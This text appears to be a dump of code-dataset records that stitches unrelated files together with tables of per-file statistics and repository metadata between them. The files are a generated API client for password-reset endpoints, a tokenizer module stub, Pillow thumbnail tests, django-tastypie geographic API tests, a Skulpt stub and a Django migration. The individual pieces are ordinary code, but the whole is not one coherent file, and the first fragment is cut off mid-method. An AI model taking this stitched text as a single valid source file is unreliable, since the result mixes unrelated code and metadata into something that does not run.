        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — no-auth endpoint.
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/noauth/resetPasswordByEmail', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def reset_password_using_post(self, reset_password_request, **kwargs):  # noqa: E501
        """resetPassword  # noqa: E501

        Complete a password reset (``POST /api/noauth/resetPassword``).
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.reset_password_using_post(reset_password_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str reset_password_request: resetPasswordRequest (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: always return only the response body.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.reset_password_using_post_with_http_info(reset_password_request, **kwargs)  # noqa: E501
        else:
            (data) = self.reset_password_using_post_with_http_info(reset_password_request, **kwargs)  # noqa: E501
            return data

    def reset_password_using_post_with_http_info(self, reset_password_request, **kwargs):  # noqa: E501
        """resetPassword  # noqa: E501

        Low-level variant of :meth:`reset_password_using_post`.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api_instance.reset_password_using_post_with_http_info(reset_password_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str reset_password_request: resetPasswordRequest (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['reset_password_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Capture named arguments via locals(), then fold kwargs in.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'reset_password_request' is set
        if ('reset_password_request' not in params or
                params['reset_password_request'] is None):
            raise ValueError("Missing the required parameter `reset_password_request` when calling `reset_password_using_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'reset_password_request' in params:
            body_params = params['reset_password_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting: none — no-auth endpoint.
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/api/noauth/resetPassword', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='str',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 38.447761
| 168
| 0.627967
| 4,110
| 36,064
| 5.181752
| 0.052068
| 0.048458
| 0.026295
| 0.033808
| 0.942621
| 0.932338
| 0.914918
| 0.902146
| 0.883599
| 0.869277
| 0
| 0.015969
| 0.282858
| 36,064
| 937
| 169
| 38.488794
| 0.807486
| 0.324534
| 0
| 0.7921
| 0
| 0
| 0.166556
| 0.070239
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043659
| false
| 0.08316
| 0.008316
| 0
| 0.116424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
526d1e470d906ba1c2261b166020cf9e7d888238
| 74
|
py
|
Python
|
py_pdf_term/tokenizer/__init__.py
|
kumachan-mis/pdf-slides-term
|
cf3319e4de723bd9424d23141803342d3c649103
|
[
"MIT"
] | 1
|
2021-01-08T16:05:30.000Z
|
2021-01-08T16:05:30.000Z
|
py_pdf_term/tokenizer/__init__.py
|
kumachan-mis/py-slides-term
|
1e9337b97ae8968950489e728fc7aeeeb7eb1f4b
|
[
"MIT"
] | 21
|
2021-01-03T13:50:59.000Z
|
2021-06-17T00:27:49.000Z
|
py_pdf_term/tokenizer/__init__.py
|
kumachan-mis/pdf-slides-term
|
cf3319e4de723bd9424d23141803342d3c649103
|
[
"MIT"
] | null | null | null |
from ._tokenizer import * # NoQA
from ._tokenizer import __all__ # NoQA
| 24.666667
| 39
| 0.743243
| 9
| 74
| 5.444444
| 0.555556
| 0.530612
| 0.77551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 74
| 2
| 40
| 37
| 0.816667
| 0.121622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
871dd1f544bfc738fa5ff63fd9a9629602cd9354
| 790
|
py
|
Python
|
Tests/test_image_thumbnail.py
|
radicalgraphics/Pillow
|
9d22c16d539f6e0356d64849b84f2feec6787179
|
[
"Python-2.0"
] | null | null | null |
Tests/test_image_thumbnail.py
|
radicalgraphics/Pillow
|
9d22c16d539f6e0356d64849b84f2feec6787179
|
[
"Python-2.0"
] | null | null | null |
Tests/test_image_thumbnail.py
|
radicalgraphics/Pillow
|
9d22c16d539f6e0356d64849b84f2feec6787179
|
[
"Python-2.0"
] | null | null | null |
from tester import *
from PIL import Image
def test_sanity():
    """Smoke test: thumbnailing a square image to a (100, 100) box keeps it square."""
    target = (100, 100)
    image = lena()
    image.thumbnail(target)
    assert_image(image, image.mode, target)
def _thumbnail_case(source, box, expected):
    """Thumbnail *source* in place to fit *box* and assert the resulting size."""
    source.thumbnail(box)
    assert_image(source, source.mode, expected)


def test_aspect():
    """thumbnail() shrinks to fit the bounding box while preserving aspect ratio."""
    # Square source in a square box: fills the box exactly.
    _thumbnail_case(lena(), (100, 100), (100, 100))
    # Tall source (128x256): width shrinks proportionally to the height limit.
    _thumbnail_case(lena().resize((128, 256)), (100, 100), (50, 100))
    _thumbnail_case(lena().resize((128, 256)), (50, 100), (50, 100))
    # Wide source (256x128): height shrinks proportionally to the width limit.
    _thumbnail_case(lena().resize((256, 128)), (100, 100), (100, 50))
    _thumbnail_case(lena().resize((256, 128)), (100, 50), (100, 50))
    # Square source resized square stays square.
    _thumbnail_case(lena().resize((128, 128)), (100, 100), (100, 100))
| 21.351351
| 41
| 0.581013
| 119
| 790
| 3.781513
| 0.159664
| 0.106667
| 0.202222
| 0.233333
| 0.851111
| 0.851111
| 0.851111
| 0.851111
| 0.722222
| 0.691111
| 0
| 0.17561
| 0.221519
| 790
| 36
| 42
| 21.944444
| 0.556098
| 0
| 0
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.28
| 1
| 0.08
| false
| 0
| 0.08
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8755386e6d3bf1a2116e7f7856c854ed02ccc1db
| 16,254
|
py
|
Python
|
tests/gis/tests/views.py
|
pavanv/django-tastypie
|
b4ffc642aa56d25d3c577ccae0a03c820b71c4bc
|
[
"BSD-3-Clause"
] | 1,570
|
2015-02-03T10:19:33.000Z
|
2022-03-29T10:34:18.000Z
|
tests/gis/tests/views.py
|
pavanv/django-tastypie
|
b4ffc642aa56d25d3c577ccae0a03c820b71c4bc
|
[
"BSD-3-Clause"
] | 587
|
2015-02-06T13:59:23.000Z
|
2022-03-09T22:56:30.000Z
|
tests/gis/tests/views.py
|
pavanv/django-tastypie
|
b4ffc642aa56d25d3c577ccae0a03c820b71c4bc
|
[
"BSD-3-Clause"
] | 492
|
2015-02-07T06:18:36.000Z
|
2022-03-29T19:06:44.000Z
|
import json
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
from django.http import HttpRequest
from testcases import TestCaseWithFixture
from .utils import skipIfSpatialite
# URL-encoded GeoJSON MultiPolygon roughly outlining Golden Gate Park,
# ready for use as a spatial-lookup query-string value in the tests below.
golden_gate_park_query = quote("""{"type": "MultiPolygon", "coordinates": [[[[-122.511067, 37.771276], [-122.510037, 37.766391], [-122.510037, 37.763813], [-122.456822, 37.765848], [-122.452960, 37.766459], [-122.454848, 37.773990], [-122.475362, 37.773040], [-122.511067, 37.771276]]]]}""")
class ViewsTestCase(TestCaseWithFixture):
def test_gets(self):
    """Exercise the read-only endpoints: API index, list, detail and set views."""
    # The top-level index lists the registered resources.
    response = self.client.get('/api/v1/', data={'format': 'json'})
    self.assertEqual(response.status_code, 200)
    payload = json.loads(response.content.decode('utf-8'))
    self.assertEqual(len(payload), 2)
    self.assertEqual(payload['geonotes'], {'list_endpoint': '/api/v1/geonotes/', 'schema': '/api/v1/geonotes/schema/'})

    # The list view returns the fixture objects with default pagination.
    response = self.client.get('/api/v1/geonotes/', data={'format': 'json'})
    self.assertEqual(response.status_code, 200)
    payload = json.loads(response.content.decode('utf-8'))
    self.assertEqual(len(payload), 2)
    self.assertEqual(payload['meta']['limit'], 20)
    self.assertEqual(len(payload['objects']), 3)
    self.assertEqual([obj['title'] for obj in payload['objects']], [u'Points inside Golden Gate Park note', u'Golden Gate Park', u'Line inside Golden Gate Park'])

    # The detail view returns a single full object.
    response = self.client.get('/api/v1/geonotes/1/', data={'format': 'json'})
    self.assertEqual(response.status_code, 200)
    payload = json.loads(response.content.decode('utf-8'))
    self.assertEqual(len(payload), 12)
    self.assertEqual(payload['title'], u'Points inside Golden Gate Park note')

    # The set view accepts ';'-separated pks and preserves the requested order.
    response = self.client.get('/api/v1/geonotes/set/2;1/', data={'format': 'json'})
    self.assertEqual(response.status_code, 200)
    payload = json.loads(response.content.decode('utf-8'))
    self.assertEqual(len(payload), 1)
    self.assertEqual(len(payload['objects']), 2)
    self.assertEqual([obj['title'] for obj in payload['objects']], [u'Golden Gate Park', u'Points inside Golden Gate Park note'])
def test_posts(self):
request = HttpRequest()
post_data = '{"content": "A new post.", "is_active": true, "title": "New Title", "slug": "new-title", "user": "/api/v1/users/1/"}'
request._body = request._raw_post_data = post_data
resp = self.client.post('/api/v1/geonotes/', data=post_data, content_type='application/json')
self.assertEqual(resp.status_code, 201)
self.assertTrue(resp['location'].endswith('/api/v1/geonotes/4/'))
# make sure posted object exists
resp = self.client.get('/api/v1/geonotes/4/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
obj = json.loads(resp.content.decode('utf-8'))
self.assertEqual(obj['content'], 'A new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
def test_puts(self):
request = HttpRequest()
post_data = '{"content": "Another new post.", "is_active": true, "title": "Another New Title", "slug": "new-title", "user": "/api/v1/users/1/", "lines": null, "points": null, "polys": null}'
request._body = request._raw_post_data = post_data
resp = self.client.put('/api/v1/geonotes/1/', data=post_data, content_type='application/json')
self.assertEqual(resp.status_code, 204)
# make sure posted object exists
resp = self.client.get('/api/v1/geonotes/1/', data={'format': 'json'})
self.assertEqual(resp.status_code, 200)
obj = json.loads(resp.content.decode('utf-8'))
self.assertEqual(obj['content'], 'Another new post.')
self.assertEqual(obj['is_active'], True)
self.assertEqual(obj['user'], '/api/v1/users/1/')
def test_api_field_error(self):
# When a field error is encountered, we should be presenting the message
# back to the user.
request = HttpRequest()
post_data = '{"content": "More internet memes.", "is_active": true, "title": "IT\'S OVER 9000!", "slug": "its-over", "user": "/api/v1/users/9001/"}'
request._body = request._raw_post_data = post_data
resp = self.client.post('/api/v1/geonotes/', data=post_data, content_type='application/json')
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content.decode('utf-8'), '{"error": "Could not find the provided users object via resource URI \'/api/v1/users/9001/\'."}')
def test_options(self):
resp = self.client.options('/api/v1/geonotes/')
self.assertEqual(resp.status_code, 200)
allows = 'GET,POST,PUT,DELETE,PATCH'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
resp = self.client.options('/api/v1/geonotes/1/')
self.assertEqual(resp.status_code, 200)
allows = 'GET,POST,PUT,DELETE,PATCH'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
resp = self.client.options('/api/v1/geonotes/schema/')
self.assertEqual(resp.status_code, 200)
allows = 'GET'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
resp = self.client.options('/api/v1/geonotes/set/2;1/')
self.assertEqual(resp.status_code, 200)
allows = 'GET'
self.assertEqual(resp['Allow'], allows)
self.assertEqual(resp.content.decode('utf-8'), allows)
class MoreViewsTestCase(TestCaseWithFixture):
    """Content-negotiation and GeoDjango round-trip tests for the geonotes API.

    Exercises JSON and XML responses, POSTing GeoJSON and XML geometry
    payloads, and the ``__within`` / ``__contains`` geographic filters.
    """

    def test_get_apis_json(self):
        """The API root serialized as JSON lists both registered resources."""
        response = self.client.get('/api/v1/', HTTP_ACCEPT='application/json')
        data = json.loads(response.content.decode('utf-8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data, {"geonotes": {"list_endpoint": "/api/v1/geonotes/", "schema": "/api/v1/geonotes/schema/"}, "users": {"list_endpoint": "/api/v1/users/", "schema": "/api/v1/users/schema/"}})

    def test_get_apis_xml(self):
        """The API root serialized as XML matches the expected document exactly."""
        response = self.client.get('/api/v1/', HTTP_ACCEPT='application/xml')
        data = response.content.decode('utf-8')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(data, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><geonotes type="hash"><list_endpoint>/api/v1/geonotes/</list_endpoint><schema>/api/v1/geonotes/schema/</schema></geonotes><users type="hash"><list_endpoint>/api/v1/users/</list_endpoint><schema>/api/v1/users/schema/</schema></users></response>')

    def test_get_list(self):
        """Listing returns all three fixtures with their geometries as GeoJSON."""
        response = self.client.get('/api/v1/geonotes/', HTTP_ACCEPT='application/json')
        data = json.loads(response.content.decode('utf-8'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(data['objects']), 3)
        # Because floating point.
        self.assertEqual(data['objects'][0]['content'], "Wooo two points inside Golden Gate park")
        self.assertEqual(data['objects'][0]['points']['type'], 'MultiPoint')
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][0], -122.475233, places=5)
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][1], 37.768616, places=5)
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][0], -122.470416, places=5)
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][1], 37.767381, places=5)
        self.assertEqual(data['objects'][1]['content'], "This is a note about Golden Gate Park. It contains Golden Gate Park\'s polygon")
        self.assertEqual(data['objects'][1]['polys']['type'], 'MultiPolygon')
        self.assertEqual(len(data['objects'][1]['polys']['coordinates']), 1)
        self.assertEqual(len(data['objects'][1]['polys']['coordinates'][0]), 1)
        self.assertEqual(len(data['objects'][1]['polys']['coordinates'][0][0]), 8)
        self.assertEqual(data['objects'][2]['content'], "A path inside Golden Gate Park! Huzzah!")
        self.assertEqual(data['objects'][2]['lines']['type'], 'MultiLineString')
        self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][0][0], -122.504544, places=5)
        self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][0][1], 37.767002, places=5)
        self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][1][0], -122.499995, places=5)
        self.assertAlmostEqual(data['objects'][2]['lines']['coordinates'][0][1][1], 37.768223, places=5)

    def test_post_object(self):
        """POST plain JSON (no geometry) and verify the created object."""
        post_data = '{"content": "A new post.", "is_active": true, "title": "New Title", "slug": "new-title", "user": "/api/v1/users/1/"}'
        response = self.client.post('/api/v1/geonotes/', data=post_data, HTTP_ACCEPT='application/json', content_type='application/json')
        self.assertEqual(response.status_code, 201)
        location = response['Location']
        self.assertTrue(location.endswith('/api/v1/geonotes/4/'))
        # make sure posted object exists
        response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        data = response.content.decode('utf-8')
        obj = json.loads(data)
        self.assertEqual(obj['content'], 'A new post.')
        self.assertEqual(obj['is_active'], True)
        self.assertEqual(obj['user'], '/api/v1/users/1/')

    def test_post_geojson(self):
        """POST a GeoJSON MultiPolygon and check the round-tripped geometry."""
        post_data = """{
            "content": "A new post.", "is_active": true, "title": "New Title2",
            "slug": "new-title2", "user": "/api/v1/users/1/",
            "polys": { "type": "MultiPolygon", "coordinates": [ [ [ [ -122.511067, 37.771276 ], [ -122.510037, 37.766391 ], [ -122.510037, 37.763813 ], [ -122.456822, 37.765848 ], [ -122.452960, 37.766459 ], [ -122.454848, 37.773990 ], [ -122.475362, 37.773040 ], [ -122.511067, 37.771276 ] ] ] ] }
        }"""
        response = self.client.post('/api/v1/geonotes/', data=post_data, HTTP_ACCEPT='application/json', content_type='application/json')
        self.assertEqual(response.status_code, 201)
        location = response['Location']
        self.assertTrue(location.endswith('/api/v1/geonotes/4/'))
        # make sure posted object exists
        response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        data = response.content.decode('utf-8')
        obj = json.loads(data)
        self.assertEqual(obj['content'], 'A new post.')
        self.assertEqual(obj['is_active'], True)
        self.assertEqual(obj['user'], '/api/v1/users/1/')
        # Expected values carry explicit float noise (e.g. 37.766390999999999)
        # to match what comes back after the DB round trip.
        self.assertEqual(obj['polys'], {u'type': u'MultiPolygon', u'coordinates': [[[[-122.511067, 37.771276], [-122.510037, 37.766390999999999], [-122.510037, 37.763812999999999], [-122.456822, 37.765847999999998], [-122.45296, 37.766458999999998], [-122.454848, 37.773989999999998], [-122.475362, 37.773040000000002], [-122.511067, 37.771276]]]]})

    def test_post_xml(self):
        """POST an XML body with a MultiPoint; read it back as JSON and as XML."""
        post_data = """<object><created>2010-03-30T20:05:00</created><polys type="null"/><is_active type="boolean">True</is_active><title>Points inside Golden Gate Park note 2</title><lines type="null"/><slug>points-inside-golden-gate-park-note-2</slug><content>A new post.</content><points type="hash"><type>MultiPoint</type><coordinates type="list"><objects><value type="float">-122.475233</value><value type="float">37.768617</value></objects><objects><value type="float">-122.470416</value><value type="float">37.767382</value></objects></coordinates></points><user>/api/v1/users/1/</user></object>"""
        response = self.client.post('/api/v1/geonotes/', data=post_data, HTTP_ACCEPT='application/xml', content_type='application/xml')
        self.assertEqual(response.status_code, 201)
        location = response['Location']
        self.assertTrue(location.endswith('/api/v1/geonotes/4/'))
        # make sure posted object exists
        response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        data = response.content.decode('utf-8')
        obj = json.loads(data)
        self.assertEqual(obj['content'], 'A new post.')
        self.assertEqual(obj['is_active'], True)
        self.assertEqual(obj['user'], '/api/v1/users/1/')
        # Weeeee! GeoJSON returned!
        self.assertEqual(obj['points'], {"coordinates": [[-122.475233, 37.768616999999999], [-122.470416, 37.767381999999998]], "type": "MultiPoint"})
        # Or we can ask for XML
        response = self.client.get('/api/v1/geonotes/4/', HTTP_ACCEPT='application/xml')
        self.assertEqual(response.status_code, 200)
        data = response.content.decode('utf-8')
        self.assertIn('<points type="hash"><coordinates type="list"><objects><value type="float">-122.475233</value><value type="float">37.768617</value></objects><objects><value type="float">-122.470416</value><value type="float">37.767382</value></objects></coordinates><type>MultiPoint</type></points>', data)

    def test_filter_within_on_points(self):
        """``points__within`` the park polygon returns the two-point fixture."""
        # Get points
        response = self.client.get('/api/v1/geonotes/?points__within=%s' % golden_gate_park_query, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        data = json.loads(response.content.decode('utf-8'))
        # We get back the points inside Golden Gate park!
        self.assertEqual(data['objects'][0]['content'], "Wooo two points inside Golden Gate park")
        self.assertEqual(data['objects'][0]['points']['type'], 'MultiPoint')
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][0], -122.475233, places=5)
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][0][1], 37.768616, places=5)
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][0], -122.470416, places=5)
        self.assertAlmostEqual(data['objects'][0]['points']['coordinates'][1][1], 37.767381, places=5)

    @skipIfSpatialite
    def test_filter_within_on_lines(self):
        """``lines__within`` the park polygon returns the path fixture."""
        # Get lines
        response = self.client.get('/api/v1/geonotes/?lines__within=%s' % golden_gate_park_query, HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        data = json.loads(response.content.decode('utf-8'))
        # We get back the line inside Golden Gate park!
        self.assertEqual(data['objects'][0]['content'], "A path inside Golden Gate Park! Huzzah!")
        self.assertEqual(data['objects'][0]['lines']['type'], 'MultiLineString')
        self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][0][0], -122.504544, places=5)
        self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][0][1], 37.767002, places=5)
        self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][1][0], -122.499995, places=5)
        self.assertAlmostEqual(data['objects'][0]['lines']['coordinates'][0][1][1], 37.768223, places=5)

    @skipIfSpatialite
    def test_filter_contains(self):
        """``polys__contains`` the two in-park points returns the park polygon."""
        points_inside_golden_gate_park = """{"coordinates": [[-122.475233, 37.768616999999999], [-122.470416, 37.767381999999998]], "type": "MultiPoint"}"""
        # Get polys that contain the points
        response = self.client.get('/api/v1/geonotes/?polys__contains=%s' % quote(points_inside_golden_gate_park), HTTP_ACCEPT='application/json')
        self.assertEqual(response.status_code, 200)
        data = json.loads(response.content.decode('utf-8'))
        # We get back the golden gate park polygon!
        self.assertEqual(data['objects'][0]['content'], "This is a note about Golden Gate Park. It contains Golden Gate Park\'s polygon")
        self.assertEqual(data['objects'][0]['polys']['type'], 'MultiPolygon')
        self.assertEqual(len(data['objects'][0]['polys']['coordinates']), 1)
        self.assertEqual(len(data['objects'][0]['polys']['coordinates'][0]), 1)
        self.assertEqual(len(data['objects'][0]['polys']['coordinates'][0][0]), 8)
| 57.843416
| 605
| 0.651901
| 2,077
| 16,254
| 5.031777
| 0.103996
| 0.120563
| 0.041049
| 0.034159
| 0.85255
| 0.805377
| 0.780882
| 0.739738
| 0.71553
| 0.705961
| 0
| 0.080018
| 0.160391
| 16,254
| 280
| 606
| 58.05
| 0.685792
| 0.031192
| 0
| 0.532338
| 0
| 0.079602
| 0.348252
| 0.086586
| 0
| 0
| 0
| 0
| 0.522388
| 1
| 0.069652
| false
| 0
| 0.034826
| 0
| 0.114428
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d8671c39972dfc377e875c6cc8ce05326db561f
| 43
|
py
|
Python
|
src/lib/robotparser.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/robotparser.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/robotparser.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
# Skulpt stub module: robotparser is not implemented in the browser runtime,
# so importing it raises a friendly "not yet implemented" error via _sk_fail.
import _sk_fail; _sk_fail._("robotparser")
| 21.5
| 42
| 0.790698
| 6
| 43
| 4.833333
| 0.666667
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 43
| 1
| 43
| 43
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0.255814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0d86dca1e5dc79a662fcb16a40161961ab7a4260
| 10,114
|
py
|
Python
|
energagement/myapp/migrations/0007_auto_20150629_1643.py
|
mpetyx/energagement-
|
8053d433057327eaff7b1fe8f03ad77700755b49
|
[
"MIT"
] | null | null | null |
energagement/myapp/migrations/0007_auto_20150629_1643.py
|
mpetyx/energagement-
|
8053d433057327eaff7b1fe8f03ad77700755b49
|
[
"MIT"
] | 12
|
2015-06-02T15:27:36.000Z
|
2015-09-17T22:05:00.000Z
|
energagement/myapp/migrations/0007_auto_20150629_1643.py
|
mpetyx/energagement-
|
8053d433057327eaff7b1fe8f03ad77700755b49
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add one ``myapp.Value`` one-to-one link per counter metric.

    All 41 fields are identical except for model, field name and the numeric
    ``related_name``, so the operations are generated from a data table
    instead of being spelled out one by one.
    """

    dependencies = [
        ('myapp', '0006_auto_20150629_1628'),
    ]

    # (model_name, field_name, related_name) for every field this migration
    # adds, in the exact order the original auto-generated operations ran.
    _new_value_links = [
        ('buildingcounter', 'ape_kwh', '14'),
        ('buildingcounter', 'co2_lt_m2', '13'),
        ('buildingcounter', 'co2_tn', '11'),
        ('buildingcounter', 'co2_tn_m2', '12'),
        ('buildingcounter', 'cosf', '10'),
        ('buildingcounter', 'euro_forecast', '18'),
        ('buildingcounter', 'euro_m2_electricity', '15'),
        ('buildingcounter', 'euro_m2_liquidfuel', '16'),
        ('buildingcounter', 'euro_m2_monthly', '17'),
        ('buildingcounter', 'kw', '9'),
        ('buildingcounter', 'kwh', '1'),
        ('buildingcounter', 'kwh_m2', '2'),
        ('buildingcounter', 'kwh_m2_cooling', '4'),
        ('buildingcounter', 'kwh_m2_heating', '5'),
        ('buildingcounter', 'kwh_m2_lighting', '3'),
        ('buildingcounter', 'kwh_m2_usagehours', '8'),
        ('buildingcounter', 'kwh_m2_user', '7'),
        ('buildingcounter', 'lt_m2', '6'),
        ('electricvehiclecounter', 'available_charging_points', '36'),
        ('electricvehiclecounter', 'co2_tn', '37'),
        ('electricvehiclecounter', 'co2_tn_user', '38'),
        ('electricvehiclecounter', 'euro_forecast', '41'),
        ('electricvehiclecounter', 'euro_m2_monthly', '40'),
        ('electricvehiclecounter', 'euro_user', '39'),
        ('electricvehiclecounter', 'kwh', '33'),
        ('electricvehiclecounter', 'kwh_user', '34'),
        ('electricvehiclecounter', 'total_charging_points', '35'),
        ('streetlightingcounter', 'ape_kwh', '29'),
        ('streetlightingcounter', 'co2_lt_m2', '28'),
        ('streetlightingcounter', 'co2_tn', '26'),
        ('streetlightingcounter', 'co2_tn_km', '27'),
        ('streetlightingcounter', 'cosf', '24'),
        ('streetlightingcounter', 'euro_forecast', '32'),
        ('streetlightingcounter', 'euro_line', '30'),
        ('streetlightingcounter', 'euro_monthly', '31'),
        ('streetlightingcounter', 'kw', '23'),
        ('streetlightingcounter', 'kwh', '19'),
        ('streetlightingcounter', 'kwh_km', '22'),
        ('streetlightingcounter', 'kwh_light', '21'),
        ('streetlightingcounter', 'kwh_line', '20'),
        ('streetlightingcounter', 'operating_lights_percentage', '25'),
    ]

    # Note: only the outermost iterable of a class-body comprehension sees
    # class-level names, which is exactly what we rely on here.
    operations = [
        migrations.AddField(
            model_name=model_name,
            name=field_name,
            field=models.OneToOneField(
                default=0, to='myapp.Value', related_name=related_name
            ),
            preserve_default=False,
        )
        for (model_name, field_name, related_name) in _new_value_links
    ]
| 38.750958
| 87
| 0.582262
| 937
| 10,114
| 6.090715
| 0.110993
| 0.129315
| 0.165236
| 0.193972
| 0.939548
| 0.939548
| 0.932189
| 0.932189
| 0.932189
| 0.824952
| 0
| 0.021528
| 0.297311
| 10,114
| 260
| 88
| 38.9
| 0.781483
| 0.002076
| 0
| 0.720472
| 0
| 0
| 0.172034
| 0.05827
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007874
| 0
| 0.019685
| 0
| 0
| 0
